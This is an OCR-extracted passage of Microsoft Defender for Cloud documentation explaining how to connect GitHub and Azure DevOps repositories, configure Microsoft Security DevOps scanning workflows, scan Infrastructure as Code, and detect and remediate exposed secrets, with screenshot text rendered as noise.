minimize vulnerable attack surfaces, thereby hardening defenses against potential 
threats. 


e Real-time notifications: Ability to integrate with workflow automations to receive 
immediate alerts when secure configurations alter, allowing for prompt action and 
ensuring sustained compliance with security protocols. 


Next steps 


e Connect your GitHub repositories to Microsoft Defender for Cloud. 
e Connect your Azure DevOps repositories to Microsoft Defender for Cloud. 


Quickstart: Connect your GitHub 
repositories to Microsoft Defender for 
Cloud 
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Cloud workloads commonly span multiple cloud platforms. Cloud security services must 
do the same. Microsoft Defender for Cloud helps protect workloads in Azure, Amazon 
Web Services, Google Cloud Platform, GitHub, and Azure DevOps. 


In this quickstart, you connect your GitHub organizations on the Environment settings 
page in Microsoft Defender for Cloud. This page provides a simple onboarding 
experience (including auto-discovery). 


By connecting your GitHub repositories to Defender for Cloud, you extend the enhanced 
security features of Defender for Cloud to your GitHub resources. These features 


include: 


e Cloud Security Posture Management features: You can assess your GitHub 
resources according to GitHub-specific security recommendations. You can also 
learn about all of the recommendations for DevOps resources. Resources are 
assessed for compliance with built-in standards that are specific to DevOps. The 
Defender for Cloud asset inventory page is a multicloud-enabled feature that helps 
you manage your GitHub resources alongside your Azure resources. 


e Workload protection features: You can extend Defender for Cloud threat 
detection capabilities and advanced defenses to your GitHub resources. 


Prerequisites 


To complete this quickstart, you need: 


e An Azure account with Defender for Cloud onboarded. If you don't already have an 


Azure account, create one for free”. 


e GitHub Enterprise with GitHub Advanced Security enabled, so you can use all 
advanced security capabilities that the GitHub connector provides in Defender for 
Cloud. 


Availability 


Aspect Details 


Release state: Preview. The Azure Preview Supplemental Terms E include legal terms that 
apply to Azure features that are in beta, in preview, or otherwise not yet 
released into general availability. 


Pricing: For pricing, see the Defender for Cloud pricing page”. 
Required Account Administrator with permissions to sign in to the Azure portal. 
permissions: Contributor on the Azure subscription where the connector will be created. 


Security Admin in Defender for Cloud. 
Organization Administrator in GitHub. 


GitHub supported GitHub Free, Pro, Team, and Enterprise Cloud 


versions: 
Regions: Australia East, Central US, West Europe 
Clouds: Lv] Commercial 


* National (Azure Government, Microsoft Azure operated by 21Vianet) 


Connect your GitHub account 

To connect your GitHub account to Microsoft Defender for Cloud: 
1. Sign in to the Azure portal Z. 
2. Go to Microsoft Defender for Cloud > Environment settings. 
3. Select Add environment. 


4. Select GitHub. 


10. 


11. 


Home > Microsoft Defender for Cloud 


ili Microsoft Defender for Cloud | Environment settings 


1owing subscription ‘Contoso DfD Testing 
P Search -F Add environment GO Refresh a Guides & Feedback 
General © Amazon Web Services en 
&0 0 O2 I8 
D overview 00 ud Platform AWS accounts GCP projects GitHub connectors AzureDevOps connectors 


@ Getting sired Jiti-cloud account management page (preview). To switch back to the classic cloud connectors experience, click here, 


ZZ Recommendations 


AU Security alerts | P Search by name Environments == All Standards == All Coverage == All 
Inventory Expand all 
E. Cloud Security Explorer (Preview) 
Name Ty 
@ workbooks 
> © Azure 


GO Community 
> ©) GitHub (preview) 
Ë Diagnose and solve problems 
> & Azure DevOps (preview) 


Cloud Security 

9 Security posture 

B Regulatory compliance 
Ọ Workload protections 


E DevOps Security (Preview) 


Management 


il Environment settings Q 


E security solutions 


TA Workflow automation 


. Enter a name (limit of 20 characters), and then select your subscription, resource 


group, and region. 


The subscription is the location where Defender for Cloud creates and stores the 
GitHub connection. 


. Select Next: Select plans. 
. Select Next: Authorize connection. 


. Select Authorize to grant your Azure subscription access to your GitHub 


repositories. Sign in, if necessary, with an account that has permissions to the 
repositories that you want to protect. 


The authorization automatically signs in by using the session from your browser's 
tab. After you select Authorize, if you don't see the GitHub organizations that you 
expect, check whether you're signed in to Microsoft Defender for Cloud on one 
browser tab and signed in to GitHub on another browser tab. 


After authorization, if you wait too long to install the DevOps application, the 


session will time out and you'll get an error message. 


. Select Install. 


Select the repositories to install the GitHub application. 
This step grants Defender for Cloud access to the selected repositories. 


Select Next: Review and create. 


12. Select Create. 


When the process finishes, the GitHub connector appears on your Environment settings 
page. 
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The Defender for Cloud service automatically discovers the repositories that you 
selected and analyzes them for any security problems. Initial repository discovery can 
take up to 10 minutes during the onboarding process. 


When you select auto-discovery during the onboarding process, repositories can take 
up to 4 hours to appear after onboarding is completed. The auto-discovery process 
detects any new repositories and connects them to Defender for Cloud. 


The Inventory page shows your selected repositories. The Recommendations page 
shows any security problems related to a selected repository. This information can take 
3 hours or more to appear. 


Learn more 


e Azure and GitHub integration 
e Security hardening for GitHub Actions z 


Next steps 


e Learn about Defender for DevOps. 
e Learn how to configure the Microsoft Security DevOps GitHub action. 
e Learn how to configure pull request annotations in Defender for Cloud. 


Quickstart: Connect your Azure DevOps 
repositories to Microsoft Defender for 
Cloud 
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Cloud workloads commonly span multiple cloud platforms. Cloud security services must 
do the same. Microsoft Defender for Cloud helps protect workloads in Azure, Amazon 
Web Services, Google Cloud Platform, GitHub, and Azure DevOps. 


In this quickstart, you connect your Azure DevOps organizations on the Environment 
settings page in Microsoft Defender for Cloud. This page provides a simple onboarding 
experience (including auto-discovery). 


By connecting your Azure DevOps repositories to Defender for Cloud, you extend the 
security features of Defender for Cloud to your Azure DevOps resources. These features 
include: 


e Microsoft Defender Cloud Security Posture Management features: You can assess 
your Azure DevOps resources for compliance with Azure DevOps-specific security 
recommendations. You can also learn about all the recommendations for DevOps 
resources. The Defender for Cloud asset inventory page is a multicloud-enabled 
feature that helps you manage your Azure DevOps resources alongside your Azure 
resources. 


e Workload protection features: You can extend the threat detection capabilities 
and advanced defenses in Defender for Cloud to your Azure DevOps resources. 


API calls that Defender for Cloud performs count against the Azure DevOps global 
consumption limit. For more information, see the common questions about Microsoft 
Defender for DevOps. 


Prerequisites 
To complete this quickstart, you need: 


e An Azure account with Defender for Cloud onboarded. If you don't already have an 
Azure account, create one for free”. 


e The Microsoft Security DevOps Azure DevOps extension configured. 


Availability 


Aspect 


Release state: 


Pricing: 


Required 
permissions: 


Regions: 


Clouds: 


Details 


Preview. The Azure Preview Supplemental Terms E include legal terms that 
apply to Azure features that are in beta, in preview, or otherwise not yet 
released into general availability. 


For pricing, see the Defender for Cloud pricing page”. 


Account Administrator with permissions to sign in to the Azure portal. 
Contributor on the Azure subscription where the connector will be created. 
Security Admin in Defender for Cloud. 

Organization Administrator in Azure DevOps. 

Basic or Basic + Test Plans Access Level in Azure DevOps. Third-party 
applications gain access via OAuth, which must be set to On. Learn more about 
OAuth. 


Central US, West Europe, Australia East 


© Commercial 
* National (Azure Government, Azure China 21Vianet) 


Connect your Azure DevOps organization 


To connect your Azure DevOps organization to Defender for Cloud by using a native 


connector: 


1. Sign in to the Azure portal £. 


2. Go to Microsoft Defender for Cloud > Environment settings. 


3. Select Add environment. 


4. Select Azure DevOps. 
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General © Amazon Web Services 
0 GO D O2 I8 
© overview © Google Cloud Platform AWS accounts GCP projects GitHub connectors AzureDevOps connectors 


7 ©) Gu 
@ Getting started ulti-cloud account management page (preview). To switch back to the classic cloud connectors experience, click here. 


y= Recommendations Azure view) 


© security alerts 


Environments == All Standards == All Coverage == All 


£ Inventory Expand all 


E Cloud Security Explorer (Preview) 
Name Ty 
@ workbooks 
> © azure 
GO Community 
> © GitHub (preview) 
@ Diagnose and solve problems 
> Azure DevOps (preview) 
Cloud Security 


9 Security posture 
6S Regulatory compliance 
9 Workload protections 


E DevOps Security (Preview) 


Management 

I Environment settings Q 
i Security solutions 

ZA Workflow automation 


. Enter a name, subscription, resource group, and region. 


The subscription is the location where Microsoft Defender for DevOps creates and 
stores the Azure DevOps connection. 


. Select Next: Select plans. 
. Select Next: Authorize connection. 
. Select Authorize. 


The authorization automatically signs in by using the session from your browser's 
tab. After you select Authorize, if you don't see the Azure DevOps organizations 
that you expect, check whether you're signed in to Microsoft Defender for Cloud 
on one browser tab and signed in to Azure DevOps on another browser tab. 


. In the popup dialog, read the list of permission requests, and then select Accept. 


Grants the ability to read users, their licenses as well as projects and extensions they can access 


Notifications (diagnostics) 


Provides access to notification-related diagnostic logs and provides the ability to enable diagnostics for individual subscriptions. 


Audit Read Log 
Grants the ability to read the auditing log to users 


Audit Manage Streams 


Grants the ability to manage auditing streams to users 


Learn more 


If you change your mind at any time, you can manage authorizations on your profile page. 


By clicking Accept, you allow this app to perform the above actions on your behalf and you agree to Microsoft Terms of Use and Privacy Statement. 


10. Select your relevant organizations from the drop-down menu. 
11. For projects, do one of the following: 


e Select Auto discover projects to discover all projects automatically and apply 
auto-discovery to all current and future projects. 


e Select your relevant projects from the drop-down menu. Then, select Auto- 
discover repositories or select individual repositories. 


12. Select Next: Review and create. 
13. Review the information, and then select Create. 


The Defender for DevOps service automatically discovers the organizations, projects, 
and repositories that you selected and analyzes them for any security problems. 


When you select auto-discovery during the onboarding process, repositories can take 
up to 4 hours to appear. 


The Inventory page shows your selected repositories. The Recommendations page 
shows any security problems related to a selected repository. 


Next steps 


Learn more about Defender for DevOps. 


Learn more about Azure DevOps. 


Learn how to create your first pipeline. 


Learn how to configure pull request annotations in Defender for Cloud. 


Configure the Microsoft Security 
DevOps GitHub action 


Article e 06/18/2023 


Microsoft Security DevOps is a command line application that integrates static analysis 
tools into the development lifecycle. Security DevOps installs, configures, and runs the 
latest versions of static analysis tools such as, SDL, security and compliance tools. 
Security DevOps is data-driven with portable configurations that enable deterministic 
execution across multiple environments. 


Security DevOps uses the following Open Source tools: 


Name Language License 
AntiMalware% AntiMalware protection in Windows from Microsoft Defender for Not 
Endpoint, that scans for malware and breaks the build if malware Open 


has been found. This tool scans by default on windows-latest agent. Source 


Bandit? Python Apache 
License 
2.0% 
BinSkim Z Binary--Windows, ELF MIT 
License Z 
ESlint Z JavaScript MIT 
License Z 
Template ARM template, Bicep file MIT 
Analyzer Z License E 
Terrascan E Terraform (HCL2), Kubernetes (SSON/YAML), Helm v3, Kustomize, Apache 
Dockerfiles, Cloud Formation License 
2.0% 
Trivy E container images, file systems, git repositories Apache 
License 
2.0% 
Prerequisites 


e An Azure subscription If you don’t have an Azure subscription, create a free 
account £ before you begin. 


e Connect your GitHub repositories. 


e Follow the guidance to set up GitHub Advanced Security“. 
e Open the Microsoft Security DevOps GitHub action” in a new window. 


e Ensure that Workflow permissions are set to Read and Write’ on the GitHub 
repository. 


Configure the Microsoft Security DevOps 
GitHub action 


To setup GitHub action: 
1. Sign in to GitHub Z. 
2. Select a repository you want to configure the GitHub action to. 


3. Select Actions. 


O Search or jump Pull requests Issues Marketplace Explore 


& Test / Contoso-Test Private 


<> Code © Issues D Pull requests H Projects © Security LY Insights ZG Settings 


4. Select New workflow. 


5. On the Get started with GitHub Actions page, select set up a workflow yourself 


Get started with GitHub Actions 


Build, test, and deploy your code. Make code reviews, branch management, and issue triaging work the way you want. Select a workflow to get started. 


Skip this andjset up a workflow yourself > 


Suggested for this repository 


Simple workflow 


By GitHub 


Start with a file with the minimum necessary 
structure. 


Configure 


6. In the text box, enter a name for your workflow file. For example, msdevopssec.ym1. 


<> Code © Issues IL Pullrequests © Actions EI Projects © Security IY Insights GZ Settings 
Contoso-Test / .github / workflows / in main 


<> Edit new file © Preview 


1 # This is a basic workflow to help you get started with Actions 
? 


7. Copy and paste the following sample action workflow “ into the Edit new file tab. 
yml 


name: MSDO windows-latest 
on: 
push: 
branches: 
- main 


jobs: 
sample: 
name: Microsoft Security DevOps Analysis 


# MSDO runs on windows-latest. 
# ubuntu-latest and macos-latest supporting coming soon 
runs-on: windows-latest 


steps: 


# Checkout your code repository to scan 
- uses: actions/checkout@v3 


# Run analyzers 

- name: Run Microsoft Security DevOps Analysis 
uses: microsoft/security-devops-action@preview 
id: msdo 


# Upload alerts to the Security tab 
- name: Upload alerts to Security tab 
uses: github/codeql-action/upload-sarif@v2 
with: 
sarif_file: ${{ steps.msdo.outputs.sarifFile }} 


# Upload alerts file as a workflow artifact 
- name: Upload alerts file as a workflow artifact 
uses: actions/upload-artifact@v3 
with: 
name: alerts 
path: ${{ steps.msdo.outputs.sarifFile }} 


For details on various input options, see action.yml £ 


8. Select Start commit 


<> Code © Issues DL Pullrequests © Actions D Projects © Security LY Insights GZ Settings 


Contoso-Test / .github / workflows | msdevopssec.yml in main Cancel changes 


<> Edit new file © Preview Spaces = 2  Nowrap + Marketplace Documentation 


# This is a basic workflow to help you get started with Actions 
Search Marketplace for Actions 
name: CI 


1 

2 

3 

b Featured Actions 
5 # Controls when the workflow will run 

6 

7 

8 

9 


on d 
Tri kfl h u ly fi “main” bi Car * 
# — the workflow on push or pull request events but only for the “main” branch By actions © 
ush: e : i 
B gaue Cache artifacts like dependencies 
branches: [ “main” ] P A 
and build outputs to improve 
10 pull_request: E 
eer workflow execution time 
u branches: [ “main” ] 
12 
13 # Allows you to run this workflow manually from the Actions tab Setup Node.js environment Wy 22k 
14 workflow_dispatch: By actions 


15 Setup a Node.js environment by 
adding problem matchers and 
optionally downloading and adding 


it to the PATH 


16 # A workflow run is made up of one or more jobs that can run sequentially or in parallel 
17 jobs: 

18 # This workflow contains a single job called “build” 

19 build: 


20 # The type of runner that the job will run on Setup Go environment vy 828 
21 runs-on: ubuntu-latest By actions @) 


= Setup a Go environment and add it 

23 # Steps represent a sequence of tasks that will be executed as part of the job to the PATH 

24 steps: 

25 # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it de d 
26 - uses: actions/checkout@v3 Setup Java JDK 819 

27 By actions © 

28 # Runs a single command using the runners shell Set up a specific version of the Java 

29 - mame: Run a one-line script JDK and add the command-line 


30 run: echo Hello, world! tools to the PATH 


31 
32 # Runs a set of commands using the runners shell 


Setup .NET Core SDK ¥ 559 
By actions 


Use Control + Space to trigger autocomplete in most situations. 


9. Select Commit new file. 


Cancel changes rt commit ~ 


on Commit new file 


Create msdevopssec.yml 
ons 


Add an optional extended description... 


ape 


Commit new file 


nr. 


The process can take up to one minute to complete. 


10. Select Actions and verify the new action is running. 


© Actions D Projects © Security b Insights SZ Settings 


Workflows New workflow AI workflows 
Showing runs from all workflows 
All workflows 
Q Filter workflow runs 
® a 
1 workflow run Event + Status + Branch ~ Actor ~ 


© Create msdevopssec.yml ZO 1 minute ago 
CI #1; Commit d16fe42 pushed by Elazark © 15s 


View Scan Results 

To view your scan results: 
1. Sign in to GitHub Z. 
2. Navigate to Security > Code scanning alerts > Tool. 
3. From the dropdown menu, select Filter by tool. 


Code scanning findings will be filtered by specific MSDO tools in GitHub. These code 
scanning results are also pulled into Defender for Cloud recommendations. 


Learn more 


e Learn about GitHub actions for Azure. 


e Learn how to deploy apps from GitHub to Azure. 


Next steps 
Learn more about Defender for DevOps. 
Learn how to connect your GitHub to Defender for Cloud. 


Discover misconfigurations in Infrastructure as Code (laC) 


Configure the Microsoft Security 
DevOps Azure DevOps extension 


Article e 10/06/2023 


O Note 


Effective December 31, 2022, the Microsoft Security Code Analysis (MSCA) 
extension is retired. MSCA is replaced by the Microsoft Security DevOps Azure 
DevOps extension. MSCA customers should follow the instructions in this article to 
install and configure the extension. 


Microsoft Security DevOps is a command line application that integrates static analysis 
tools into the development lifecycle. Microsoft Security DevOps installs, configures, and 
runs the latest versions of static analysis tools (including, but not limited to, SDL/security 
and compliance tools). Microsoft Security DevOps is data-driven with portable 
configurations that enable deterministic execution across multiple environments. 


The Microsoft Security DevOps uses the following Open Source tools: 


Name Language License 
AntiMalware E AntiMalware protection in Windows from Microsoft Defender Not Open 
for Endpoint, that scans for malware and breaks the build if Source 


malware has been found. This tool scans by default on 
windows-latest agent. 


Bandit 7 Python Apache 
License 2.0 £ 


BinSkim Z Binary--Windows, ELF MIT License Z 

ESlint Z JavaScript MIT License 7 

Template ARM template, Bicep file MIT License z 

Analyzer & 

Terrascan Z Terraform (HCL2), Kubernetes (JSON/YAML), Helm v3, Apache 
Kustomize, Dockerfiles, Cloud Formation License 2.0 £ 

Trivy E container images, file systems, git repositories Apache 


License 2.0 Z 


O Note 


Effective September 20, 2023, the secret scanning (CredScan) tool within the 


Microsoft Security DevOps (MSDO) Extension for Azure DevOps has been 
deprecated. MSDO secret scanning will be replaced with GitHub Advanced 


Security for Azure DevOps Z. 


Prerequisites 


e Admin privileges to the Azure DevOps organization are required to install the 


extension. 


If you don't have access to install the extension, you must request access from your 


Azure DevOps organization's administrator during the installation process. 


Configure the Microsoft Security DevOps Azure 


DevOps extension 


To configure the Microsoft Security DevOps Azure DevOps extension: 


1. Sign in to Azure DevOps% . 


2. Navigate to Shopping Bag > Manage extensions. 


QJ Azure DevOps | Ø Search 
| OB peer mseng 

ceapex Projects My work items My pull requests 
azurecom 
msazure Tec TechnicalContent 

Se 

GZ Supports planning and tracking 
3 more organizations work for Content & Learning's 

Content Development 

New oraanization organization. Project Owner: C& 


3. Select Shared. 


O Note 


Browse marketplace 


Manage extensions 


J 


Y Filter projects 


AzureDevOps 


Azure DevOps helps you plan 
smarter, collaborate better, and 
ship faster with a modern set of 


developers services. It includes 


If you've already installed the Microsoft Security DevOps extension Z , it will 


be listed in the Installed tab. 


4. Select Microsoft Security DevOps. 


Extensions 


Installed Requested Shared 


Security Browse marketplace 


EO Microsoft Security DevOps by Microsoft 


Build tasks for performing security analysis. 


(‘A SARIF SAST Scans Tab by Microsoft DevLabs 


5. Select Install. 


6. Select the appropriate organization from the dropdown menu. 


7. Select Install. 


8. Select Proceed to organization. 


Configure your pipelines using YAML 


To configure your pipeline using YAML: 


1. Sign into Azure DevOps & 


2. Select your project. 


3. Navigate to Pipelines 


4. Select New pipeline. 


GOI Azure DevOps dfd365 


Ø zerran EK 


GO overview 
E peri 

D repos 

| d Pipelines 
B Environments 
#7 Releases 
D Library 

E Task groups 


7 


Deployment groups 


5. Select Azure Repos Git. 


ntosoD/D Pipeline: 


OO 


Pipelines 


Recent All Runs 


Recently run pipelines 


Pipeline 


© avo-cicoscantest 
@ sample-Findings (1) 


© contosonfo 


Last run 


#20220804,1 + Set up CI with Azure Pipelines 


2 Individual Cl for @ 


#20220804.1 + Set up Cl with Azure Pipelines 


2 Individual Cl for 


+#20220802.4 + Update azure-pipelinesyml for Azure Pipelines 


Azure DevOps has started rollout of changes to disable communication over TLS 1.0 and TLS 1.1. This change is permanent and if your tools are dependent on TLS 1.0/1.1 for commu 
take necessary actions to enable TLS1.2, as detailed in the blog, 


Y 


= ü 


unication with Azure DevOps, please 


x 


New pipeline ZO 


Y Filter pipelines 


Connect Select Configure Review 


New pipeline 


Where is your code? 


Azure Repos Git YAML 


Free private Git repositories, pull requests, and code search 


Bitbucket Cloud YAML 
Hosted by Atlassian 


GitHub YAML 
Home to the world’s largest community of developers 


The self-hosted version of GitHub Enterprise 


Other Git 


Any generic Git repository 


Subversion 
Centralized version control by Apache 


OO GitHub Enterprise Server YAML 
Pa 
ei 


Use the classic editor to create a pipeline without YAML. 


6. Select the relevant repository. 


New pipeline 


Select a repository 


D Filter by keywords 


AK ADO-CICDScanTest 


AK ContosoDfD 
AK Sample-Findings 


7. Select Starter pipeline. 


New pipeline 


Configure your pipeline 


oe Docker 


docker Build a Docker image 


ww Docker 


docker Build and push an image to Azure Container Registry 


Deploy to Azure Kubernetes Service 
Build and push image to Azure Container Registry; Deploy to Azure Kubernetes Service 


Deploy to Kubernetes - Review app with Azure DevSpaces 
Build and push image to Azure Container Registry; Deploy to Azure Kuberentes Services and setu 


Starter pipeline 


Start with a minimal pipeline that you can customize to build and deploy your code. 


= | Existing Azure Pipelines YAML file 


Select an Azure Pipelines YAML file in any branch of the repository. 


Show more 


8. Paste the following YAML into the pipeline: 
yml 


# Starter pipeline 
# Start with a minimal pipeline that you can customize to build and 
deploy your code. 
# Add steps that build, run tests, deploy, and more: 
# https://aka.ms/yaml 
trigger: none 
pool: 
vmImage: 'windows-latest' 
steps: 
- task: MicrosoftSecurityDevOps@1 
displayName: ‘Microsoft Security DevOps' 


9. To commit the pipeline, select Save and run. 


The pipeline will run for a few minutes and save the results. 


O Note 


Install the SARIF SAST Scans Tab extension on the Azure DevOps organization in 
order to ensure that the generated analysis results will be displayed automatically 
under the Scans tab. 


Learn more 


e Learn how to create your first pipeline. 


e Learn how to deploy pipelines to Azure. 


Next steps 
Learn more about Defender for DevOps. 
Learn how to connect your Azure DevOps to Defender for Cloud. 


Discover misconfigurations in Infrastructure as Code (laC). 


Discover misconfigurations in 
Infrastructure as Code (laC) 
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Once you have set up the Microsoft Security DevOps GitHub action or Azure DevOps 
extension, you can configure the YAML configuration file to run a single tool or multiple 
tools. For example, you can set up the action or extension to run Infrastructure as Code 
(laC) scanning tools only. This can help reduce pipeline run time. 


Prerequisites 


e Configure Microsoft Security DevOps for GitHub and/or Azure DevOps based on 
your source code management system: 
o Microsoft Security DevOps GitHub action 
o Microsoft Security DevOps Azure DevOps extension. 

e Ensure you have an laC template in your repository. 


Configure laC scanning and view the results in 
GitHub 
1. Sign in to GitHub Z. 


2. Navigate to your repository's home page > .github/workflows > 


msdevopssec.yml that was created in the prerequisites. 


3. Select Edit file. 


P main ~ Contoso-Test / github / workflows / msdevopssec.yml View runs Go to file 
Create msdevopssecyml wv Latest commit d16fe42 19 hours ago © History 


A 1 contributor 


36 lines (29 sloc) | 1.11 KB Raw Blame CH U 
1 # This is a basic workflow to help you get started with Actions 


4. Under the Run Analyzers section, add: 
yml 


with: 
categories: ‘IaC' 


© Note 


Categories are case sensitive. 


26 # Run analyzers 

27 - name: Run Microsoft Security DevOps Analysis 
28 uses: microsoft/security-devops-action@preview 
29 id: msdo 

30 with: 


31 categories: ‘Iac' 


5. Select Start Commit 


6. Select Commit changes. 


Cancel changes Start commit ~ 


Commit changes 


Update msdevopssec.yml 


made change| 


E -> Commit directly to the main branch. 


© IU Create a new branch for this commit and start a 
pull request. Learn more about pull requests. 


Commit changes 


7. (Optional) Add an laC template to your repository. Skip if you already have an laC 
template in your repository. 


For example, commit an laC template to deploy a basic Linux web application” to 


your repository. 


a. Select azuredeploy. json. 


master ~ azure-quickstart-templates / quickstarts / n 


and azure-quickstart-templates pipeline add ur 


ID README.md é 

ID azuredeploy.json N 

ID azuredeploy.parameters.json N 

ID metadata.json N 
b. Select Raw 


c. Copy all the information in the file. 
JSON 


{ 


"$schema": "https://schema.management.azure.com/schemas/2019-04- 
Q1/deploymentTemplate.json#", 
"contentVersion": "1.0.0.0", 
"parameters": { 
"webAppName": { 

"type": "string", 

"defaultValue": "“AzureLinuxApp", 

"metadata": { 


"description": "Base name of the resource such as web app 
name and app service plan " 
J 
"minLength": 2 
J 
"sku": { 


Moye ESENIN ia 
"defaultValue": "S1", 
"metadata": { 
"description": "The SKU of App Service Plan 


} 


KO 
"linuxFxVersion": { 
"type: "string, 
"defaultValue": "php|7.4", 
"metadata": { 
"description": "The Runtime stack of current web app" 
} 
KO 
allocation a 
"type": "string", 


"defaultValue": "[resourceGroup().location]", 
"metadata": { 
"description": "Location for all resources." 
} 
} 
}s 


"variables": { 
"webAppPortalName": "[concat(parameters('webAppName'), '- 
webapp')]", 
"appServicePlanName": "[concat('AppServicePlan-', 
parameters('webAppName' )) ]" 
Jo 


"resources": [ 
{ 
"type": "Microsoft.Web/serverfarms", 
"apiVersion": "2020-06-01", 
"name": "[variables('appServicePlanName')]", 
"location": "[parameters('location')]", 
eskus 
"name": "[parameters('sku')]" 
Jo 
kinde EEEa 
"properties": { 
"reserved": true 


"type": "Microsoft.Web/sites", 
"apiVersion": "2020-06-01", 


"name": "[variables('webAppPortalName')]", 
"location": "[parameters('location')]", 
kinde: kappa, 


"dependsOn": [ 
"[resourceld('Microsoft.Web/serverfarms', 
variables('appServicePlanName'))]" 
L 
"properties": { 
"serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 
variables('appServicePlanName'))]", 
"siteConfig": { 
"LinuxFxVersion": "[parameters('linuxFxVersion')]" 
b 
} 
} 


d. On GitHub, navigate to your repository. 


e. Select Add file > Create new file. 


F main ~ P 1branch Ọ 0 tags 


Update msdevopssec.yml 


E  github/workflows Update msdevopssec.yml 


Add a README with an overview of your project. 


f. Enter a name for the file. 
g. Paste the copied information into the file. 
h. Select Commit new file. 


The file is now added to your repository. 


E main ~ E 1branch Ọ Otags 


Create azuredeploy.json 


E  github/workflows Update msdevopssec.yml 


DD azuredeploy.json Create azuredeploy.json 


Add a README with an overview of your project. 


8. Confirm the Microsoft Security DevOps scan completed: 


a. Select Actions. 
b. Select the workflow to see the results. 


Go to file Add file ~ 


~~ Upload files 


)2 commits 


4 days ago 


Add a README 


Go to file Add file ~ 


d8edda9 now ED 2 commits 


4 days ago 


now 


Add a README 


9. Navigate to Security > Code scanning alerts to view the results of the scan (filter 


by tool as needed to see just the laC findings). 


Configure laC scanning and view the results in 


Azure DevOps 


To view the results of the laC scan in Azure DevOps 


1. Sign in to Azure DevOps £. 
2. Select the desired project 
3. Select Pipeline. 


4. Select the pipeline where the Microsoft Security DevOps Azure DevOps Extension 
is configured. 


5. Edit the pipeline configuration YAML file adding the following lines: 
6. Add the following lines to the YAML file 
yml 


inputs: 
categories: ‘IaC' 


- task: MicrosoftSecurityDevOps@1 
displayName: - ‘Microsoft Security DevOps’ 


categories: 'Iac' 


7. Select Save. 


8. (Optional) Add an laC template to your repository. Skip if you already have an laC 
template in your repository. 


9. Select Save to commit directly to the main branch or Create a new branch for this 
commit. 


10. Select Pipeline > Your created pipeline to view the results of the laC scan. 


11. Select any result to see the details. 


View details and remediation information on 
laC rules included with Microsoft Security 
DevOps 


The laC scanning tools that are included with Microsoft Security DevOps, are Template 
Analyzer (which contains PSRule &) and Terrascan £. 


Template Analyzer runs rules on ARM and Bicep templates. You can learn more about 
Template Analyzer's rules and remediation details £. 


Terrascan runs rules on ARM, CloudFormation, Docker, Helm, Kubernetes, Kustomize, 


and Terraform templates. You can learn more about the Terrascan rules Z. 


Learn more 


e Learn more about Template Analyzer. 
e Learn more about PSRule £. 


e Learn more about Terrascan Z. 


In this tutorial you learned how to configure the Microsoft Security DevOps GitHub 
Action and Azure DevOps Extension to scan for Infrastructure as Code (laC) security 
misconfigurations and how to view the results. 


Next steps 
Learn more about Defender for DevOps. 
Learn how to connect your GitHub to Defender for Cloud. 


Learn how to connect your Azure DevOps to Defender for Cloud. 


Detect exposed secrets in code 
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When passwords and other secrets are stored in source code, it poses a significant risk 
and could compromise the security of your environments. Defender for Cloud offers a 
solution by using secret scanning to detect credentials, secrets, certificates, and other 
sensitive content in your source code and your build output. Secret scanning can be run 
as part of the Microsoft Security DevOps for Azure DevOps extension. To explore the 
options available for secret scanning in GitHub, learn more about secret scanning Z in 
GitHub. 

© Note 


Effective September 2023, the Secret Scanning option (CredScan) within Microsoft 
Security DevOps (MSDO) Extension for Azure DevOps will be deprecated. MSDO 
Secret Scanning will be replaced by the Configure GitHub Advanced Security for 
Azure DevOps features - Azure Repos offering. 


Check the list of supported file types, exit codes and rules and descriptions. 


Prerequisites 


e An Azure subscription. If you don't have a subscription, you can sign up for a free 
account 2. 


e Configure the Microsoft Security DevOps Azure DevOps extension 


Setup secret scanning in Azure DevOps 


You can run secret scanning as part of the Azure DevOps build process by using the 
Microsoft Security DevOps (MSDO) Azure DevOps extension. 


To add secret scanning to Azure DevOps build process: 
1. Sign in to Azure DevOps “ 
2. Navigate to Pipeline. 
3. Locate the pipeline with MSDO Azure DevOps Extension is configured. 


4. Select Edit. 


5. Add the following lines to the YAML file 
yml 
inputs: 
categories: 'secrets' 
6. Select Save. 


By adding the additions to your yaml file, you'll ensure that secret scanning only runs 
when you execute a build to your Azure DevOps pipeline. 


Remediate secrets findings 


When credentials are discovered in your code, you can remove them. Instead you can 
use an alternative method that won't expose the secrets directly in your source code. 
Some of the best practices that exist to handle this type of situation include: 


e Eliminating the use of credentials (if possible). 
e Using secret storage such as Azure Key Vault (AKV). 


e Updating your authentication methods to take advantage of managed identities 
(MSI) via Azure Active Directory (AAD). 


Remediate secrets findings using Azure Key Vault 
1. Create a key vault using PowerShell. 
2. Add any necessary secrets for your application to your Key Vault. 


3. Update your application to connect to Key Vault using managed identity with one 
of the following: 


e Azure Key Vault for App Service application 
e Azure Key Vault for applications deployed to a VM 


Once you have remediated findings, you can review the Best practices for using Azure 
Key Vault. 
Remediate secrets findings using managed identities 


Before you can remediate secrets findings using managed identities, you need to ensure 
that the Azure resource you're authenticating to in your code supports managed 


identities. You can check the full list of Azure services that can use managed identities to 


access other services. 


If your Azure service is listed, you can manage your identities for Azure resources. 


Suppress false positives 


When the scanner runs, it may detect credentials that are false positives. Inline- 
suppression tools can be used to suppress false positives. 


Some reasons to suppress false positives include: 


e Fake or mocked credentials in the test files. These credentials can't access 


resources. 


e Placeholder strings. For example, placeholder strings may be used to initialize a 
variable, which is then populated using a secret store such as AKV. 


e External library or SDKs that 's directly consumed. For example, openssl. 


e Hard-coded credentials for an ephemeral test resource that only exists for the 
lifetime of the test being run. 


e Self-signed certificates that are used locally and not used as a root. For example, 
they may be used when running localhost to allow HTTPS. 


e Source-controlled documentation with non-functional credential for illustration 


purposes only 
e Invalid results. The output isn't a credential or a secret. 


You may want to suppress fake secrets in unit tests or mock paths, or inaccurate results. 
We don't recommend using suppression to suppress test credentials. Test credentials 
can still pose a security risk and should be securely stored. 


O Note 


Valid inline suppression syntax depends on the language, data format and 
CredScan version you are using. 


Credentials that are used for test resources and environments shouldn't be suppressed. 
They're being used to demonstration purposes only and don't affect anything else. 


Suppress a same line secret 


To suppress a secret that is found on the same line, add the following code as a 
comment at the end of the line that has the secret: 


Bash 


#[ SuppressMessage("Microsoft.Security", "CS@@1:SecretInLine", 
Jüstification= ... er) 


Suppress a secret in the next line 


To suppress the secret found in the next line, add the following code as a comment 
before the line that has the secret: 


Bash 


#[SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", 
Justification="... .")] 


Next steps 


e Learn how to configure pull request annotations in Defender for Cloud to 
remediate secrets in code before they're shipped to production. 


Enable pull request annotations in 
GitHub and Azure DevOps 
